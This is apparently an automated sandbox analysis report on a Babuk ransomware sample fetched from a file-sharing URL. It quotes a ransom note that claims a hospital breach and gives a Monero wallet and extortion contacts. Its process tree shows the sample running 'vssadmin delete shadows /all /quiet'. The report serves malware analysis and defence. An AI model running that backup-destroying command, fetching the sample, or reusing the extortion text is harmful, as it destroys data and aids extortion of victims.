Analysis

  • max time kernel
    229s
  • max time network
    192s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    23-01-2022 12:04

General

  • Target

    https://transfer.sh/45dIVs/worstgeneration.exe

Score
10/10

Malware Config

Extracted

Path

C:\How To Restore Your Files.txt

Ransom Note
You are probably wondering why you are receiving a message from me. Yesterday, duncanregional.com got breached. You are probably not aware, but over the past few days we have been exfiltrating all of your data that we could get our hands on. We took over 150GB data + patient userdata from dba servers. What happened to your files? Your network was been penetrated. All of your files were encrypted using AES-256-CTR with ChaCha8 Cipher. WARNING: Don't try to decrypt your files, shadow copies were removed, recovery methods can lead to the impossibility of recovery of the certain files. We exclusively have decryption software for your situation, no decryption software is available in the public. Pay 60,000 (USD) in XMR (Monero) to this address: 4BExj4Z7n73316oWSd6k3Wj7A12PFVUSeHoobSPpaCJVdH6Z1oRBBssemrpwW5GyRt7xi3SQCeJzUa1uFoWWNySYCxoHv13 How do you buy XMR? https://bisq.network/ to buy XMR using fiat. Alternatively use a Cryptocurrency exchange to buy XMR: https://www.kraken.com/ Use this guide: https://www.getmonero.org/ After sending the specified amount to our wallet we will provide you with the decryption keys to unlock your files. If you do not respond (24 hour deadline, starting now), or we do not receive a response from you we will start the data to our potential buyers, and leak a partial, All of your clients (patients / employers) will be informed and given proof that their data has been compromised and publish everything in a public way in multiple places and outlets to get more customers interested in buying the data and also reporting the availability of this data to the appropriate news platforms. Contact: telegram: @redeyeg0d email: yourd34d@ctemplar.com
Emails

yourd34d@ctemplar.com

URLs

https://bisq.network/

https://www.getmonero.org/

Signatures

  • Babuk Locker

    RaaS first seen in 2021 initially called Vasa Locker.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 48 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://transfer.sh/45dIVs/worstgeneration.exe
    1⤵
    • Modifies Internet Explorer Phishing Filter
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2680
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2680 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:3700
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6KXLFSUN\worstgeneration.exe
      "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6KXLFSUN\worstgeneration.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1156
      • C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
        "C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"
        3⤵
        • Executes dropped EXE
        • Modifies extensions of user files
        • Enumerates connected drives
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1312
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1468
          • C:\Windows\system32\vssadmin.exe
            vssadmin.exe delete shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:1736
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3716
          • C:\Windows\system32\vssadmin.exe
            vssadmin.exe delete shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:2540
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2948

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Defense Evasion
    • File Deletion: T1107 (2)
    • Modify Registry: T1112 (2)
  • Discovery
    • Query Registry: T1012 (1)
    • Peripheral Device Discovery: T1120 (1)
    • System Information Discovery: T1082 (2)
  • Impact
    • Inhibit System Recovery: T1490 (2)

Downloads
